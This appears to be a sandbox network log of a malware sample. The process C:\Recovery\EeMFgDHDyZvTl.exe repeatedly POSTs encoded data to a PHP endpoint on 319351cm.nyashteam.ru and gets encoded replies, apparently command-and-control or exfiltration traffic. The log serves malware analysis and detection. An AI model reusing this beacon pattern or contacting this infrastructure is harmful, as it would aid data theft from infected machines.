Dec 6, 2024 03:16:00.071260929 CET	50164	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.190911055 CET	80	50164	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.420212984 CET	50164	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.468303919 CET	50165	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.468534946 CET	50164	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.539983034 CET	80	50164	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.588051081 CET	80	50165	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.588144064 CET	50165	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.588524103 CET	50165	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.630152941 CET	80	50164	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.637789965 CET	50166	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.708523035 CET	80	50165	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.757457018 CET	80	50166	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.757533073 CET	50166	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.757766008 CET	50166	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.877422094 CET	80	50166	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.935868025 CET	50165	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:00.963218927 CET	80	50164	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:00.963282108 CET	50164	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:01.055767059 CET	80	50165	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:01.055814981 CET	80	50165	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:01.107714891 CET	50166	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:01.227479935 CET	80	50166	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:01.674289942 CET	80	50165	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:01.758177042 CET	50165	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:01.860096931 CET	80	50166	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:01.935765028 CET	50166	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:01.937547922 CET	80	50165	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:02.082879066 CET	50165	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:02.094239950 CET	80	50166	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:02.212599993 CET	50165	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:02.213274002 CET	50167	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:02.213275909 CET	50166	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:02.332571030 CET	80	50165	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:02.332664013 CET	50165	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:02.333060026 CET	80	50167	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:02.333241940 CET	80	50166	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:02.333316088 CET	50166	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:02.333348036 CET	50167	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:02.333457947 CET	50167	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:02.453116894 CET	80	50167	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:03.489178896 CET	80	50167	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:03.670839071 CET	50167	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:03.726332903 CET	50167	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:16:03.846191883 CET	80	50167	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:04.207228899 CET	80	50167	172.67.186.200	192.168.2.6
Dec 6, 2024 03:16:04.249476910 CET	50167	80	192.168.2.6	172.67.186.200

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 03:12:17.446036100 CET	63141	53	192.168.2.6	1.1.1.1
Dec 6, 2024 03:12:17.806129932 CET	53	63141	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 03:12:17.446036100 CET	192.168.2.6	1.1.1.1	0x8bb0	Standard query (0)	319351cm.nyashteam.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 03:12:17.806129932 CET	1.1.1.1	192.168.2.6	0x8bb0	No error (0)	319351cm.nyashteam.ru		172.67.186.200	A (IP address)	IN (0x0001)	false
Dec 6, 2024 03:12:17.806129932 CET	1.1.1.1	192.168.2.6	0x8bb0	No error (0)	319351cm.nyashteam.ru		104.21.2.8	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

319351cm.nyashteam.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49737	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:17.932862043 CET	296	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:18.280986071 CET	344	OUT	Data Raw: 00 0b 04 03 03 0f 01 04 05 06 02 01 02 03 01 03 00 0a 05 01 02 02 03 01 02 03 0f 00 04 0f 06 06 0f 0f 06 5a 01 02 05 03 0c 50 05 01 06 0a 05 55 07 05 0e 0d 0d 54 06 06 01 00 03 05 01 0b 05 0a 02 51 0c 00 00 02 04 09 0c 57 0f 02 0e 00 0f 04 05 51 Data Ascii: ZPUTQWQPRVTV\L~c~`v^aK^@hof^cR^\|\|K{lgo^vJkCh@tY\|j_~V@x}\~\[
Dec 6, 2024 03:12:19.077861071 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:19.398199081 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PClHbF3%2B3mu6r5lI7t8CQBWASSv8gT%2B5jhvpmAyk9ENJN2Bxl9naQ1OCjJ9dBJNOHhcNuRdyjcoiKmh5p%2BMaE1uTJn9bcqX4Gh7EXahzzB3zQA7PYWUNZy3TQ1PeZiFwcKYwHOwRhy4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0124fe642bf-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3828&min_rtt=1733&rtt_var=4840&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=640&delivery_rate=78935&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 30 0d 0a 56 4a 7e 01 6c 6e 6b 44 6c 5c 60 02 7f 58 7b 4b 7e 5e 6f 41 7e 63 69 09 7b 73 74 06 7e 71 70 4b 77 63 61 42 79 58 75 49 76 5f 68 4a 7c 71 78 01 55 4b 72 50 76 62 55 06 6b 04 69 06 6b 67 62 0d 6c 76 6b 52 7e 05 67 4a 61 4c 69 4c 77 61 79 01 7f 71 66 05 7e 6f 7c 0a 7f 67 5e 5f 61 4c 7b 06 7c 5c 61 04 7c 70 6d 02 78 5e 6f 5d 7b 59 78 07 78 7d 7c 5b 7a 4c 52 04 6c 60 7a 41 6b 5e 5d 58 6f 49 56 06 7c 61 73 4e 77 61 6f 5a 7a 51 41 5b 7f 5e 7b 55 6b 61 5f 0c 76 42 7f 5d 78 42 56 05 63 73 62 4e 79 62 62 59 7e 7c 71 5c 78 07 66 4b 76 5d 6f 01 62 71 64 4c 74 5f 7e 50 7e 5d 79 5f 77 4c 6d 01 76 66 63 50 7f 6c 65 01 77 6f 77 5d 7f 4d 6c 49 6f 6c 5d 03 6f 60 66 4a 7c 6d 7f 51 74 67 6c 04 7e 62 6d 50 7e 6d 7c 51 7b 54 7a 02 7d 04 7e 5c 7b 5d 46 51 7f 7c 78 40 7e 5e 7c 40 7d 77 79 5e 7b 53 73 44 6f 04 7f 59 7e 62 67 44 7c 67 5d 42 68 4e 72 54 7a 63 5e 04 7d 4c 59 5a 60 63 79 51 7b 5c 79 4a 76 76 64 02 7d 66 70 4d 7e 48 53 4f 74 72 59 4a 7c 62 53 4d 7d 77 50 40 78 58 70 0c 7d 63 63 04 77 72 5b 02 77 [TRUNCATED] Data Ascii: 540VJ~lnkDl\`X{K~^oA~ci{st~qpKwcaByXuIv_hJ\|qxUKrPvbUkikgblvkR~gJaLiLwayqf~o\|g^_aL{\|\a\|pmx^o]{Yxx}\|[zLRl`zAk^]XoIV\|asNwaoZzQA[^{Uka_vB]xBVcsbNybbY~\|q\xfKv]obqdLt_~P~]y_wLmvfcPlewow]MlIol]o`fJ\|mQtgl~bmP~m\|Q{Tz}~\{]FQ\|x@~^\|@}wy^{SsDoY~bgD\|g]BhNrTzc^}LYZ`cyQ{\yJvvd}fpM~HSOtrYJ\|bSM}wP@xXp}ccwr[w_mGqv}RdC}IswaYHx\}\|`aywZxItM{}gxb^{sfL`x{wdI}r{wqt~BgJYV\|OmAwl^{Rptpz@z_S~RTzq~KvMQvap
Dec 6, 2024 03:12:19.398418903 CET	912	IN	Data Raw: 4f 74 61 76 08 7c 70 62 04 76 62 71 04 76 65 68 40 7e 6c 79 4d 76 7c 7c 4f 7f 73 74 07 78 7c 7b 03 7a 70 66 03 7c 53 60 0c 77 67 78 05 7e 72 54 42 7d 6d 63 42 7a 6d 50 41 7d 4c 69 4f 7d 70 64 0a 7c 42 70 43 7d 5e 74 0c 7e 59 54 43 7a 7d 6b 49 7b Data Ascii: Otav\|pbvbqveh@~lyMv\|\|Ostx\|{zpf\|S`wgx~rTB}mcBzmPA}LiO}pd\|BpC}^t~YTCz}kI{rd_k~Yg~`iyMhL~r^vsiOzauuvxJ\|fp~H[trwJr[L}gT@yv\|A~skvL}Lw_mH\|O~lpAwQIuaQG{LuG~^yxw\|LxIRLx}Uy\d{]~{]NZywdjo@vOxjUgJhw{UkfQuB]\zlZtqPzbaHjB
Dec 6, 2024 03:12:19.432904005 CET	272	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 384 Expect: 100-continue
Dec 6, 2024 03:12:19.747740030 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:19.747951984 CET	384	OUT	Data Raw: 53 52 5f 59 59 5c 56 5a 5c 56 52 5a 50 58 5a 55 58 5b 5b 5d 50 5c 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_YY\VZ\VRZPXZUX[[]P\VZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C( >+V?+&;T%;W$>=7\4<5'*,5^7W/']/!Q!(
Dec 6, 2024 03:12:20.239362955 CET	966	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vUD0kieKrS%2BK%2FgnoV8upntanm5Ha5sKz1SpLaTt6hipxHENGLQKbL%2BOgVG6XMYUT%2BN%2FHEB9goU4fd84%2BdscDMLjH5WYUhC1qtuFLQ8ozA7DdZavmPxOqgxI5IY2bEPBBeIIYoHiLMtU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c016781c42bf-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=5695&min_rtt=1733&rtt_var=7289&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2198&recv_bytes=1296&delivery_rate=2270606&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 04 30 2d 01 00 35 32 0d 03 39 3e 2b 08 32 3e 0c 02 2c 2b 28 15 21 28 25 5f 28 59 2c 12 33 1d 2f 5f 28 2f 39 12 28 01 3b 57 3e 28 23 5b 00 13 25 06 29 3d 07 09 2a 29 2f 03 32 20 3e 59 28 26 0c 10 29 00 01 1a 34 2a 03 14 22 03 2c 18 27 2d 3f 53 2e 25 0a 5c 2b 27 26 14 31 24 21 5e 0e 11 3a 0f 26 0d 21 07 23 16 02 09 27 30 33 00 3f 39 2c 5b 27 01 2f 1f 3f 1a 28 54 24 0f 26 0c 33 3f 3b 0b 26 39 3e 13 20 01 05 1f 39 2c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&0-529>+2>,+(!(%_(Y,3/_(/9(;W>(#[%)=)/2 >Y(&)4",'-?S.%\+'&1$!^:&!#'03?9,['/?(T$&3?;&9> 9,#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49743	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:19.833494902 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:12:20.186563969 CET	1012	OUT	Data Raw: 53 53 5a 5a 59 58 56 5f 5c 56 52 5a 50 5c 5a 5c 58 52 5b 56 50 54 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SSZZYXV_\VRZP\Z\XR[VPTV\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@( )+6'Z1*2<<'1=,!?T2/\!($;=']/!Q!8
Dec 6, 2024 03:12:20.942823887 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:21.257694960 CET	812	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A1Wz0qN3hB7lK%2BUFfTUgko4Ftqta1H%2BUgRkJyjcrFgROv2PCgPJL656tb3v8%2Fdw8K1eBqPy6fTXbFhMSJ0DYd6SHZkU4jP1WBTm1KdxXc%2BHfnBJ1Ud3AxRDA5Xze99U%2Fh0k0Q88n8Tc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c01dec5ac323-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6996&min_rtt=1680&rtt_var=11262&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=33025&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49744	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:20.393889904 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue
Dec 6, 2024 03:12:20.749053001 CET	1296	OUT	Data Raw: 56 52 5f 51 59 5f 56 59 5c 56 52 5a 50 5f 5a 54 58 5b 5b 5e 50 58 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VR_QY_VY\VRZP_ZTX[[^PXVTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"=*>R?51W%?S$82)4?1:";7W,']/!Q!4
Dec 6, 2024 03:12:21.479123116 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:21.744002104 CET	960	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VLTbqvbPTxes4uCv2XqOYE1f8osTV7mqx41oRP4xBl9UZluJN%2B2j%2Fa7RFZXwk2M8RLsS0TCSpaV3%2BRmVKhoEBMJyy%2Bc5qh0fPMDYDQmZhLumWeMm6mofxTi42chAQeJx4jObLGyg4%2Bs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0214aa04356-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4313&min_rtt=1568&rtt_var=6079&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1569&delivery_rate=62037&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 00 33 13 33 02 20 22 30 1d 2e 10 33 09 26 10 0f 5b 2e 16 28 5f 36 05 14 05 29 2c 23 09 24 27 28 01 2a 2c 3a 00 28 06 30 0f 29 28 23 5b 00 13 26 5f 3e 04 36 1b 29 07 30 5a 26 33 25 01 3d 0f 3a 5a 3e 3e 01 56 23 03 3e 01 35 3d 38 50 26 2d 09 57 2c 1c 24 5b 28 37 04 51 31 24 21 5e 0e 11 3a 0c 26 0a 2e 5b 34 28 06 0d 27 23 30 5e 2b 00 33 02 24 01 33 1f 3f 27 3c 1e 33 0f 25 56 30 59 30 54 32 3a 31 01 20 3c 3f 1c 2c 3c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&33 "0.3&[.(_6),#$'(*,:(0)(#[&_>6)0Z&3%=:Z>>V#>5=8P&-W,$[(7Q1$!^:&.[4('#0^+3$3?'<3%V0Y0T2:1 <?,<#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49746	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:21.518404007 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:12:21.874469995 CET	1012	OUT	Data Raw: 56 54 5f 50 59 50 56 52 5c 56 52 5a 50 58 5a 54 58 5d 5b 58 50 5f 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VT_PYPVR\VRZPXZTX][XP_V\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A=22,?S$'+1<'W$8-)>#Y7&"848']/!Q!(
Dec 6, 2024 03:12:22.608503103 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:22.862684011 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lMuS9%2B8sI7UfB04Igm2Loq38tEhE5Zu11Km9dinxlQ7Kb%2BCo4L6EoAP6fjkqxnzhGseoYW7iE%2Be3gs6AdS6T6hyExmngQidkB3r88VCLbtcgfSI8%2BSTDNqEL95ws0HaEZdU%2BZ9WayrA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0284949de9a-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8250&min_rtt=1624&rtt_var=13861&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=26723&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:12:23.054327965 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49752	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:23.290283918 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:12:23.639786959 CET	1012	OUT	Data Raw: 53 54 5a 5e 59 5d 53 5f 5c 56 52 5a 50 52 5a 52 58 5c 5b 58 50 5f 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: STZ^Y]S_\VRZPRZRX\[XP_V^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C) ));>%7\%1&??3*7\!/-S':Y!8;,']/!Q!
Dec 6, 2024 03:12:24.380392075 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:24.660351992 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4z2MTw4E%2B%2F031ue86iANBJNh%2BUm6PSocrnOP6sssD7tvAbIsMe5UnS%2FTvGl7ixz81uKbMbEcigOTSZn0zI9f1HSAvujCQf5cx08UFlJvIOw%2Bp7DXlegMRxykhhffA444Yx9MERdIAfE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c03369c64301-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2969&min_rtt=1553&rtt_var=3415&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=113301&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:12:24.852257967 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49758	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:12:25.285113096 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:12:25.639802933 CET	1008	OUT	Data Raw: 53 56 5f 5b 59 5a 56 5d 5c 56 52 5a 50 5a 5a 57 58 59 5b 5d 50 5c 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SV_[YZV]\VRZPZZWXY[]P\VYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>0&=;<+21W&3;>$4?5&,!;;']/!Q!,
Dec 6, 2024 03:12:26.456103086 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:12:26.737772942 CET	803	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:12:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=icj5%2FqsU4TYy5ut7eDK%2BD1guAuHDfXto4z5MPikq45jVermi0qiqYRYZOi4BocWTW28S1DF20WCFaZ5sQbvv2D6hfnpsk2e30w1ggIrlrIVMb%2BoYVFysLX29WE1cApQLtC%2BkdBR20WU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c0405b51437f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3815&min_rtt=2099&rtt_var=4220&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=92218&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:12:26.933687925 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49764	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
